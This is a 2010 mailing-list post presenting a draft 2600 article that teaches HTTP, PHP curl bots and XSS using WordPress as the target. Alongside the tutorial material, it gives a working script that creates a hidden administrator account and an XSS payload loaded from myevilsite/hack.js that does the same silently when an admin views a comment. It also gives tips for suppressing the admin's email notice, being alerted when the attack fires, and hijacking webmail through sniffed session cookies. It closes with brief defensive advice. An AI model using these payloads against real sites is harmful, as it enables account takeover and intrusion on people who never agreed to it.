[Noisebridge-discuss] Coding Bots and Hacking Wordpress

Wed May 26 04:17:47 UTC 2010

Hey Noisebridge, I'm writing an article to submit to 2600 and I'd love
feedback. I've pasted it below. Hopefully it's easy to follow and can
teach people with just basic programming and web development skills
about this stuff.

micah

Coding Bots and Hacking Wordpress

I'm going to explain how to write code that automatically loads web
pages, submits forms, and does sinister stuff, while looking like it's
human. These techniques can be used to exploit cross-site scripting
(XSS) vulnerabilities, download copies of web-based databases, cheat
in web games, and quite a bit more. The languages I'm going to be
using are PHP and Javascript. I'm primarily going to use wordpress as
an example website that I'll be attacking, but that's only because I'm
a fan of wordpress. This stuff will work against any website, as long
as you can find an XSS hole.

The HTTP protocol
=================

Before I dive too deeply into code, it's important to know the basics
of how the web works. It all runs over this protocol called HTTP,
which is a very simple way that web browsers can communicate with web
servers. The browser makes requests, and the server returns some sort
of output based on that. Each time a browser makes an HTTP request, it
includes a lot of header information, and each time the web server
responds, it includes header information as well. Sometimes websites
use HTTPS, which is just HTTP wrapped in a layer of SSL encryption, so
it uses the exact same protocol.

So, here's an example. I just opened up my web browser and typed
"2600.com" in the address bar and hit enter. Here's the GET request I
sent to the server:

GET / HTTP/1.1
Host: 2600.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US;
rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

My web browser was smart enough to figure out the IP address of
2600.com and open up a connection to it on port 80. The first line is
telling the web server I want whatever lives at the root path (/) of
the site. The next line is telling it that the host I'm looking
for is 2600.com (sometimes the same web server hosts several different
websites, so the Host header lets the web server know which one you're
interested in). The third line is my user agent string, and this tells
the web server some information about me. From this one you can
tell that I'm using Firefox 3.6.3 and I'm using Mac OS X 10.6. The
rest of the lines aren't all that important, but you can feel free to
look them up.
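
To make the shape of a request concrete, here's a rough Javascript sketch that builds the text of a minimal GET request. The function name buildGetRequest is made up for this example, and the "Connection: close" header is my own addition to keep the request short. It isn't something my browser sent.

```javascript
// Build the text of a minimal HTTP/1.1 GET request.
// buildGetRequest is a hypothetical helper, not part of any library.
function buildGetRequest(host, path, userAgent) {
    var lines = [
        'GET ' + path + ' HTTP/1.1',
        'Host: ' + host,
        'User-Agent: ' + userAgent,
        'Connection: close' // assumption: ask the server to hang up afterwards
    ];
    // every line ends with CRLF, and an empty line ends the headers
    return lines.join('\r\n') + '\r\n\r\n';
}

var request = buildGetRequest(
    '2600.com',
    '/',
    'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3'
);
console.log(request);
```

Writing that string to a TCP connection on port 80 is, give or take a few headers, all a browser does to ask for a page.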

A note about the user agent: It normally tells the web server what
operating system and web browser you're using, and web servers use
this information for a bunch of different things. Google Analytics
uses this to give website owners stats about what computers their
visitors use. A lot of websites check to see if the user agent says
you're using an iPhone or an Android phone and then serve up a
mobile version of the website instead of the normal one. And then
there are bots. When Google spiders a website to add pages to its
search engine database, it uses the HTTP protocol just like you and
me, but its user agent string looks something like this instead:
"Googlebot/2.1 (+http://www.google.com/bot.html)". It's ridiculously
easy to spoof your user agent. Try downloading the User Agent Switcher
Firefox extension just to see how easy it is.
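
Here's a small sketch of the kind of check a website might run on the user agent string. The function name siteVersionFor and the three labels are made up for illustration, and real sites use much longer lists of patterns. The point is that the decision rests entirely on a string the client chooses to send.

```javascript
// Guess what kind of visitor this is from the User-Agent header alone.
// siteVersionFor is a hypothetical name; real checks are far more detailed.
function siteVersionFor(userAgent) {
    if (/iPhone|Android/.test(userAgent)) return 'mobile';
    if (/Googlebot/.test(userAgent)) return 'bot';
    return 'desktop';
}

console.log(siteVersionFor('Googlebot/2.1 (+http://www.google.com/bot.html)'));
// an abbreviated, illustrative phone user agent (not a captured one)
console.log(siteVersionFor('Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en)'));
```

Anyone who sends the Googlebot string gets treated like Googlebot by a check like this, which is exactly why spoofing is so easy.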

After sending that GET request for / to 2600.com, here's the response
my browser got:

HTTP/1.1 301 Moved Permanently
Date: Sat, 22 May 2010 23:02:49 GMT
Location: http://www.2600.com/
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

It returned with a 301 status code, which means it has Moved
Permanently. Other common codes are 200, which means everything is OK,
404, which means Not Found, and 500, which means Internal Server
Error. The rest of the lines are HTTP headers, but the important one
is the Location header. If my browser gets a Location header in a
response, that means it needs to redirect to there instead. In this
case, loading http://2600.com/ wants me to redirect to
http://www.2600.com/. My browser faithfully complies:

GET / HTTP/1.1
Host: www.2600.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US;
rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
[more headers...]

I'm sending another GET request to the server, but this time with the
host as www.2600.com, and it responds:

HTTP/1.1 200 OK
[more headers...]

<html>
<head>
<title>2600: The Hacker Quarterly</title>
<script type="text/javascript" src="nav.js"></script>
<link rel="stylesheet" type="text/css" href="nav.css" />
<link rel="alternate" type="application/rss+xml" title="2600.com RSS
Feed" href="http://www.2600.com/rss.xml">
[more HTML code ...]

To recap, when we try to go to http://2600.com, it redirects to
http://www.2600.com (technically, these are separate domain names and
could be hosting separate sites). Once it returned a 200 OK, it spit
out the HTML code of the website hosted at / on www.2600.com. My
browser sends requests, the server sends responses. That's called
HTTP.
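
A bot has to do by hand what the browser did automatically there: read the status code, and follow the Location header if it's a redirect. Here's a minimal sketch of that decision. The names parseResponseHead and redirectTarget are hypothetical, and the parser is deliberately naive (it keeps only the last copy of a repeated header).

```javascript
// Parse the status line and headers of a raw HTTP response.
// parseResponseHead and redirectTarget are hypothetical helper names.
function parseResponseHead(rawHead) {
    var lines = rawHead.split(/\r?\n/);
    // the status line looks like "HTTP/1.1 301 Moved Permanently"
    var status = parseInt(lines[0].split(' ')[1], 10);
    var headers = {};
    for (var i = 1; i < lines.length; i++) {
        var colon = lines[i].indexOf(':');
        if (colon === -1) continue; // blank or malformed line
        var name = lines[i].substring(0, colon).trim().toLowerCase();
        // a repeated header (like Set-Cookie) would overwrite itself here
        headers[name] = lines[i].substring(colon + 1).trim();
    }
    return { status: status, headers: headers };
}

// Return the URL to follow, or null if this isn't a redirect.
function redirectTarget(response) {
    var isRedirect = response.status >= 300 && response.status < 400;
    if (isRedirect && response.headers.location) {
        return response.headers.location;
    }
    return null;
}

var head = [
    'HTTP/1.1 301 Moved Permanently',
    'Date: Sat, 22 May 2010 23:02:49 GMT',
    'Location: http://www.2600.com/',
    'Content-Type: text/html; charset=iso-8859-1'
].join('\r\n');

console.log(redirectTarget(parseResponseHead(head))); // http://www.2600.com/
```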

A quick note about cookies
==========================

Cookies are name-value pairs that websites use to save information in
your web browser. One of their main uses is to keep persistent data
about you in an active "session" as you make several requests to the
server. When you login to a website, the only way it knows that you're
still logged in the next time you reload the page is because you send
your cookie back to the website as a line in the headers. You pass
cookies to the web server with the "Cookie:" header, and the web
server sets cookies in your browser with the "Set-Cookie:" header.
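
As a rough sketch of that round trip, this turns the values of some Set-Cookie headers into the single value a client would send back in its Cookie header. The function name cookieHeaderFrom and the cookie names and values are made up, and it ignores paths and expiry dates entirely, which a real browser does not.

```javascript
// Turn a list of Set-Cookie header values into one Cookie header value.
// cookieHeaderFrom is a hypothetical helper; it ignores path and expiry.
function cookieHeaderFrom(setCookieValues) {
    var jar = {}; // name -> value; a later duplicate overwrites an earlier one
    setCookieValues.forEach(function (value) {
        var pair = value.split(';')[0]; // drop attributes like path and httponly
        var eq = pair.indexOf('=');
        if (eq === -1) return; // not a name=value pair
        jar[pair.substring(0, eq).trim()] = pair.substring(eq + 1).trim();
    });
    return Object.keys(jar).map(function (name) {
        return name + '=' + jar[name];
    }).join('; ');
}

// illustrative values only
console.log(cookieHeaderFrom([
    'session=abc123; path=/; httponly',
    'theme=dark; path=/'
]));
// session=abc123; theme=dark
```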

This is important to understand because a lot of bots you write might
require you to correctly handle cookies to do what you want,
especially if you want to do something like exploit an XSS bug, make a
social networking worm, or write a script that downloads and stores
everything from someone's web mail account.

Some tools to see wtf is going on
=================================

You rarely actually see what HTTP headers you're sending to web
servers, and what headers are included in the responses. For writing
this article I used the Firefox extensions Live HTTP Headers and
Tamper Data. Other Firefox extensions that you might find useful are
FireBug and Web Developer Toolbar (useful for cookie management).
Also, Wireshark and tcpdump are great tools for any sort of network
monitoring. And if you're trying this on more complicated sites,
especially ones with lots of ajax, I highly suggest using an
intercepting proxy like Paros or WebScarab.

Start with something simple
===========================

With PHP, the best way to write a web bot is to use the curl
functions. The curl functions to know are curl_init(), curl_setopt(),
curl_exec(), and curl_close(). Here's an example of a simple PHP
script that checks 2600's twitter feed and prints out the latest
tweet. And, just for laughs, we'll pretend to be using IE6 on Windows.

<?php
// get twitter.com/2600, and store it in $output
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'http://twitter.com/2600');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)');
$output = curl_exec($ch);
curl_close($ch);

// search through $output for the latest tweet
$start_string = '<span class="entry-content">';
$start = strpos($output, $start_string, 0) + strlen($start_string);
$end = strpos($output, '</span>', $start);
$tweet = substr($output, $start, $end-$start);

// display this tweet to the screen
echo(trim($tweet)."\n");
?>

Go ahead and make a new php file and put this code in it. Run it
either from a web browser (you need to copy it to the web root of a
computer with a web server installed) or the command line (type "php
filename.php", as long as you have php and libcurl installed).
Assuming twitter hasn't changed their layout since I wrote this, it
should print out 2600's latest tweet.

I'll go through it line by line. In the first block of code,
curl_init() gets called and stores a handle to the curl object in the
variable $ch. The next 3 lines of code add options to this curl
object: the URL of the website it will be loading, a flag telling
curl_exec() to return the HTML code instead of printing it, and a fake
user agent string pretending we're using IE6. The next line of code runs
curl_exec(), which actually sends the HTTP request to
http://twitter.com/2600, and then stores everything returned into
$output. And then the next line, just to be good, closes the curl
object. Now we have all the HTML from that request stored in the
variable $output, as one large string.

The next block of code searches through the returned HTML code for the
first tweet. It uses very common string handling functions: strpos(),
strlen(), and substr(). Every programming language has some of this
stuff built in, and if you're not familiar with these functions I
encourage you to look them up. Basically, this searches $output for
the first occurrence of the string '<span class="entry-content">', and
then the next '</span>' after that, and stores what's between those in
the variable $tweet. I figured this out by going to twitter.com/2600
myself and viewing the source of the page.

And then the final echo() function just prints out $tweet. The trim()
function strips the whitespace, and then I add a newline at the end
to make the display a little prettier. Pretty cool, huh?
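
One thing the script above doesn't do is check whether the markers were found at all. In PHP, strpos() returns false when there's no match, and the arithmetic quietly carries on with garbage. Here's the same search-between-two-markers idea as a Javascript sketch that gives up cleanly instead. The name extractBetween is hypothetical and the sample HTML is made up.

```javascript
// Return the text between the first startMarker and the next endMarker,
// or null if either marker is missing. extractBetween is a hypothetical name.
function extractBetween(text, startMarker, endMarker) {
    var markerAt = text.indexOf(startMarker);
    if (markerAt === -1) return null; // start marker not found
    var start = markerAt + startMarker.length;
    var end = text.indexOf(endMarker, start);
    if (end === -1) return null; // end marker not found
    return text.substring(start, end).trim();
}

// made-up sample page
var page = '<li><span class="entry-content"> hello world </span></li>';
console.log(extractBetween(page, '<span class="entry-content">', '</span>'));
// hello world
```

If the site changes its layout, a bot built this way notices right away instead of printing half a page of HTML.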

Automatically creating wordpress users
======================================

Now let's do something a little more difficult. Let's login to a
wordpress website (for this example, hosted at
http://localhost/wordpress/) and add a new administrator user. I'll do
this manually first and record the HTTP conversation with the Live
HTTP Headers extension.

POST /wordpress/wp-login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US;
rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
[some extra headers...]
Referer: http://localhost/wordpress/wp-login.php
Cookie: wordpress_test_cookie=WP+Cookie+check
Content-Type: application/x-www-form-urlencoded
Content-Length: 116

log=admin&pwd=supersecret&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2F&testcookie=1

This time I sent a POST request (the ones above for 2600.com and
twitter.com were GET requests), and this time I also sent a Referer
header, and a Cookie header. POST and GET are similar, but GET
requests send all the data through the URL, while POST requests send
the data beneath the headers in the POST request. As you can see,
beneath the POST request headers is a URL-encoded string of name-value
pairs. "log" is set to "admin" (which is the username), "pwd" is set
to "supersecret" (which is the password), and then there are other
hidden fields that get sent too: "wp-submit" is "Log In", "redirect_to"
is "http://localhost/wordpress/wp-admin/", and "testcookie" is "1".
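
If you'd rather not URL-encode a POST body by hand, here's a short sketch using URLSearchParams, which is built into current browsers and Node.js. It rebuilds the login body from the request above out of the plain field values. The variable names are my own.

```javascript
// Rebuild the login POST body from plain name-value pairs.
var fields = new URLSearchParams();
fields.append('log', 'admin');
fields.append('pwd', 'supersecret');
fields.append('wp-submit', 'Log In');
fields.append('redirect_to', 'http://localhost/wordpress/wp-admin/');
fields.append('testcookie', '1');

// toString() does the encoding: spaces become "+", ":" becomes "%3A", etc.
var body = fields.toString();
console.log(body);
console.log(body.length); // 116, the Content-Length from the captured request
```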

And here was the response:

HTTP/1.1 302 Found
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/wordpress/
Set-Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1274755424%7C70045a572d5f43ad9d0fe822683fe7f6;
path=/wordpress/wp-content/plugins; httponly
Set-Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1274755424%7C70045a572d5f43ad9d0fe822683fe7f6;
path=/wordpress/wp-admin; httponly
Set-Cookie: wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1274755424%7C32f9298d9371bbc7f684dafb2ce161bb;
path=/wordpress/; httponly
Location: http://localhost/wordpress/wp-admin/
[and some more headers here too...]

After logging in, the website sets four cookies, and each cookie has a
path. As you can see, two of the cookies have the same name and value,
but different paths. Don't worry about this: the web browser will only
send one copy of this cookie. Now I'm going ahead and adding a new
user called "hacker" with the email address
"hacker@fakeemailaddress.com" and the password "letmein". Here's the
POST request:

POST /wordpress/wp-admin/user-new.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US;
rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
[more headers...]
Referer: http://localhost/wordpress/wp-admin/user-new.php
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1274758230%7C2fd245efd985716182bf76c2a5d44693;
wordpress_test_cookie=WP+Cookie+check; wp-settings-time-1=1274585390;
wp-settings-1=m6%3Do;
wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1274758230%7C037c433811bd050823ae570f3b3d38d5
Content-Type: application/x-www-form-urlencoded
Content-Length: 236

_wpnonce=07cd245b42&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fuser-new.php&action=adduser&user_login=hacker&first_name=&last_name=&email=hacker%40fakeemailaddress.com&url=&pass1=letmein&pass2=letmein&role=administrator&adduser=Add+User

In order to add a new user, I need to send a POST request to
/wordpress/wp-admin/user-new.php. I need to pass along a cookie string
with the cookies that were set earlier. The data for the POST request
needs to include these fields: "_wpnonce", "_wp_http_referer",
"action", "user_login", "first_name", "last_name", "email", "url",
"pass1", "pass2", "role", and "adduser" (although several of the
values are blank).
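
Which of the four login cookies travel with this request comes down to their paths. Here's a simplified sketch of the path matching browsers do (loosely following RFC 6265), applied to the cookie names and paths from the login response above. The function names pathMatches and cookiesFor are made up, and this ignores domains, expiry, and the secure flag.

```javascript
// Does a cookie with this path get sent for this request path?
// Simplified from the browser rule; pathMatches is a hypothetical name.
function pathMatches(requestPath, cookiePath) {
    if (requestPath === cookiePath) return true;
    if (requestPath.indexOf(cookiePath) !== 0) return false; // not a prefix
    // the prefix has to end on a "/" boundary
    return cookiePath.charAt(cookiePath.length - 1) === '/' ||
           requestPath.charAt(cookiePath.length) === '/';
}

var hash = 'bbfa5b726c6b7a9cf3cda9370be3ee91';
var cookies = [
    { name: 'wordpress_test_cookie', path: '/wordpress/' },
    { name: 'wordpress_' + hash, path: '/wordpress/wp-content/plugins' },
    { name: 'wordpress_' + hash, path: '/wordpress/wp-admin' },
    { name: 'wordpress_logged_in_' + hash, path: '/wordpress/' }
];

// List the names of the cookies that would be sent for a request path.
function cookiesFor(requestPath) {
    return cookies.filter(function (cookie) {
        return pathMatches(requestPath, cookie.path);
    }).map(function (cookie) {
        return cookie.name;
    });
}

console.log(cookiesFor('/wordpress/wp-admin/user-new.php'));
```

The copy scoped to /wordpress/wp-content/plugins doesn't match a wp-admin URL, so only one copy of the duplicated cookie gets sent.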

The first field, _wpnonce, is going to cause a problem. That's there
specifically to prevent people like me from doing things like this.
The value is "07cd245b42", but how are we supposed to know that? If I
look at the source code of the add user page, it contains this: <input
type="hidden" id="_wpnonce" name="_wpnonce" value="07cd245b42" />

To get that value, we'll just need to send a GET request to
/wordpress/wp-admin/user-new.php first, search through its HTML for
the hidden field called "_wpnonce", and then submit the form with that
value. Here's a PHP script that does all of that:

<?php
// set the url of the wordpress site to do this on
$wp_url = 'http://localhost/wordpress';

// this will only work if we already have a username and password
$username = 'admin';
$password = 'supersecret';

// set the username, password, and email of the new user we will create
$new_username = 'hacker';
$new_password = 'letmein';
$new_email = 'hacker@fakeemailaddress.com';

// make up a user agent to use, lets say IE6 again
$user_agent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)';

// start by logging into wordpress (using POST, not GET)
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url.'/wp-login.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
'log='.urlencode($username).'&pwd='.urlencode($password).'&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2F&testcookie=1');
curl_setopt($ch, CURLOPT_REFERER, $wp_url.'/wp-login.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
$output = curl_exec($ch);
curl_close($ch);

// search $output for the four cookies, add them to an array
$index = 0;
$cookieStrings = array();
for($i=0; $i<4; $i++) {
    $start_string = 'Set-Cookie: ';
    $start = strpos($output, $start_string, $index) + strlen($start_string);
    $end_string = ';';
    $end = strpos($output, $end_string, $start);
    $cookieStrings[] = substr($output, $start, $end-$start);
    $index = $end + strlen($end_string);
}

// turn cookies into a single cookie string (skipping the 3rd cookie,
// since it's the same as the 2nd)
$cookie = $cookieStrings[0].'; '.$cookieStrings[1].'; '.$cookieStrings[3];

// load the add user page
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url.'/wp-admin/user-new.php');
curl_setopt($ch, CURLOPT_REFERER, $wp_url.'/wp-admin/');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
$output = curl_exec($ch);
curl_close($ch);

// search for _wpnonce hidden field value
$start_string = '<input type="hidden" id="_wpnonce" name="_wpnonce" value="';
$start = strpos($output, $start_string, 0) + strlen($start_string);
$end_string = '" />';
$end = strpos($output, $end_string, $start);
$_wpnonce = substr($output, $start, $end-$start);

// add our new user
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url.'/wp-admin/user-new.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
'_wpnonce='.urlencode($_wpnonce).'&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fuser-new.php&action=adduser&user_login='.urlencode($new_username).'&first_name=&last_name=&email='.urlencode($new_email).'&url=&pass1='.urlencode($new_password).'&pass2='.urlencode($new_password).'&role=administrator&adduser=Add+User');
curl_setopt($ch, CURLOPT_REFERER, $wp_url.'/wp-admin/user-new.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
$output = curl_exec($ch);
curl_close($ch);
?>

This little piece of code totally works (with wordpress 2.9.2 anyway).
Change the $wp_url, $username, and $password to a wordpress site you
control, and run it. Go look at your wordpress users. You'll have a
new administrator user called "hacker".
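
One fragile spot in that script is the _wpnonce search: it only works as long as wordpress prints the attributes of the hidden field in exactly that order. Here's a sketch of a slightly more forgiving lookup that finds the input tag by its name attribute, wherever it appears in the tag. The function name hiddenFieldValue is made up, it only understands double-quoted attributes, and a real HTML parser would be sturdier still.

```javascript
// Find the value of the <input> whose name attribute is fieldName.
// hiddenFieldValue is a hypothetical helper; double-quoted attributes only.
function hiddenFieldValue(html, fieldName) {
    var inputTags = html.match(/<input\b[^>]*>/gi) || [];
    for (var i = 0; i < inputTags.length; i++) {
        var nameMatch = /\sname="([^"]*)"/i.exec(inputTags[i]);
        if (!nameMatch || nameMatch[1] !== fieldName) continue;
        var valueMatch = /\svalue="([^"]*)"/i.exec(inputTags[i]);
        return valueMatch ? valueMatch[1] : null;
    }
    return null; // no such field on the page
}

var form = '<form><input type="hidden" id="_wpnonce" name="_wpnonce" value="07cd245b42" /></form>';
console.log(hiddenFieldValue(form, '_wpnonce')); // 07cd245b42
```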

Thoughts on PHP bots
====================

Using PHP and curl, you can write a bot that can do (almost) anything
a human can do, as long as you're able to do it by hand first and see
what the HTTP headers look like. And since it's a bot, it's simple to
run it, say, 150000 times in a row, or to run it once every 5 minutes
until you want to stop it.

What if you want to be anonymous? It's easy to use curl through a
proxy server, and in fact you can even use curl through the Tor
network (though it will be much slower). Just look up the docs for
curl_setopt() to find out how.

I mentioned writing bots that can download and store all the email in
a webmail account. Well, webmail uses HTTP, which means it uses
cookies to keep track of active sessions. It's totally feasible to
write a PHP script that, given a cookie string for someone's Yahoo!
mail account (which you can get by sniffing traffic on a public wifi
network), can download and store all of their email as long as they don't
log out before your script is done running.

These are all things you can do with PHP, or with any other
server-side language like Ruby, Python, Perl, or C. But Javascript on
the other hand runs in web browsers, and you can get other people
(like admins or other users of websites you're trying to hack) to run
your code in their browsers if you exploit an XSS bug.

What is XSS?
============

An XSS bug is where you can submit information that includes
Javascript code to a website, that gets displayed back to users of
that website. So, for example, maybe your First Name is 'Bob', and
your Last Name '<script>alert(0)</script>'. If, after you submit this
form, it says your first name is 'Bob' and it pops up an alert box
that says 0, that means you've found an XSS bug. If someone else goes
to your profile page, it will pop up an alert box for them that says 0
too.
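
To see where the bug comes from, here's a sketch of a profile page being built two ways. The function names are made up for this example. The unsafe version pastes the submitted text straight into the HTML, and the safe version escapes the characters that HTML treats as special first.

```javascript
// Replace the characters HTML treats as special with their entities.
function escapeHtml(text) {
    return String(text)
        .replace(/&/g, '&amp;')
        .replace(/</g, '&lt;')
        .replace(/>/g, '&gt;')
        .replace(/"/g, '&quot;')
        .replace(/'/g, '&#39;');
}

// Vulnerable: whatever the user typed becomes part of the page's markup.
function renderProfileUnsafe(firstName, lastName) {
    return '<p>Name: ' + firstName + ' ' + lastName + '</p>';
}

// Safer: the user's text can only ever show up as text.
function renderProfileSafe(firstName, lastName) {
    return '<p>Name: ' + escapeHtml(firstName) + ' ' + escapeHtml(lastName) + '</p>';
}

var lastName = '<script>alert(0)</script>';
console.log(renderProfileUnsafe('Bob', lastName));
console.log(renderProfileSafe('Bob', lastName));
// <p>Name: Bob &lt;script&gt;alert(0)&lt;/script&gt;</p>
```

The first line of output contains a live script tag. The second shows the same characters on screen, but the browser never runs them.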

Popping up an alert box is harmless enough, but with the power of
ajax, you can do a lot more sinister stuff. Admins often have the
ability to add new users to websites. If an admin stumbles upon your
profile where the Last Name field actually contains Javascript, that
code could silently add you as an admin user on the site, and
even alert you that this has happened so you can login, escalate
privileges to command execution on their server, and cover your
tracks.

People use ajax as a buzzword to mean any sort of fancy Javascript.
Really, all ajax is is the ability for Javascript to make its own HTTP
requests and retrieve the responses, similar to the curl library in
PHP.

The wordpress XSS payload
=========================

The PHP script that added a new user is a good start, but it's not
very useful for hacking websites. You need to already have access!
With XSS, you trick someone else who does have access to run it for
you. Pretend with me that there's an XSS bug in the comment form in
wordpress. You can post a comment and include Javascript code that
will then get executed whenever anyone loads the page. You post a
comment that says:

Good point! And all the other commentors are a bunch of trolls!
<script src=http://myevilsite/hack.js></script>

Whenever anyone loads this page, their browser fetches
http://myevilsite/hack.js and runs it as if it were part of the
wordpress site. Here's what's in hack.js:

// setup
var wp_url = 'http://localhost/wordpress';
var new_username = 'hacker';
var new_password = 'letmein';
var new_email = 'hacker@fakeemailaddress.com';

// create an ajax object and return it
function ajaxObject() {
    var http;
    if(window.XMLHttpRequest) { http=new XMLHttpRequest(); }
    else{ http=new ActiveXObject("Microsoft.XMLHTTP"); }
    return http;
}

// load the user page
var http1 = ajaxObject();
http1.open("GET",wp_url+"/wp-admin/user-new.php",true);
http1.onreadystatechange = function() {
    if(http1.readyState != 4)
        return;

    // search for _wpnonce hidden field value
    var start_string = '<input type="hidden" id="_wpnonce" name="_wpnonce" value="';
    var start = http1.responseText.indexOf(start_string, 0) + start_string.length;
    var end_string = '" />';
    var end = http1.responseText.indexOf(end_string, start);
    var _wpnonce = http1.responseText.substring(start,end);

    // add our new user
    var http2 = ajaxObject();
    http2.open("POST",wp_url+"/wp-admin/user-new.php",true);
    http2.setRequestHeader("Content-type","application/x-www-form-urlencoded");
    // encodeURIComponent() also encodes "+", which escape() leaves alone
    http2.send('_wpnonce='+encodeURIComponent(_wpnonce)+'&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fuser-new.php&action=adduser&user_login='+encodeURIComponent(new_username)+'&first_name=&last_name=&email='+encodeURIComponent(new_email)+'&url=&pass1='+encodeURIComponent(new_password)+'&pass2='+encodeURIComponent(new_password)+'&role=administrator&adduser=Add+User');
}
http1.send();

If an admin loads this page, a new administrator user called "hacker"
will silently get created. If you want to test this out on a wordpress
site you control, go ahead and upload this script as hack.js
somewhere, and include it in a post (by editing the post in HTML
mode). Make sure you delete the "hacker" user first if it's already
there. Then, while you're logged in, load the post page, and go check
to see what wordpress users your site has. There will be a new one.

This particular script could be improved in a couple of ways. For
example, you can check to see if the user is logged into wordpress
first before trying to add a new user (there will be a lot more
traffic in the logs if each and every visitor sends extra requests to
wp-admin/user-new.php). Also, by default wordpress sends an email to
the administrator of the site when a new user account gets created, so
really this won't be silent at all. To get around this, you can have
the script first load the wordpress settings page to see what the
admin email address is set to, then post the form to change the email
address to your own email address, then add a new user, then submit
the settings form again to change the email address back. In this way,
the real admin would never get an email about it, and you would
instead.

It might take a week for the admin to get around to running your code,
it might just take a day, or they might never run it. If you want to
be alerted when it happens, you can use ajax to do that too. Make a
page on a website you control (say, http://myevilsite/alert.php) that
sends you an email when it gets loaded. Then make the ajax GET that
script when it gets executed, and you'll get an email when your new
account is created. If you're creative, the possibilities are endless.

There are two ways to protect your websites against automated web bots
and crazy XSS attacks. First, the only way to defeat bots is to
include some sort of CAPTCHA (those annoying images with skewed
letters you need to retype). Make sure it actually works -- I've seen
forms with CAPTCHAs that still work fine if you ignore the CAPTCHA
field. Your CAPTCHA doesn't have to be skewed letters, but it does
have to be annoying. All it is is a simple Turing test, something
that's easy for humans to answer but hard/impossible for computers,
which means you'll have to test your users before they can continue if
it's important to you to thwart bots. And finally, fix all your XSS
holes! XSS gets dismissed as a lowly not-very-harmful vulnerability
because "so what if someone pops up an alert box?". Hopefully this
article will show you that it's a bit more dangerous than that.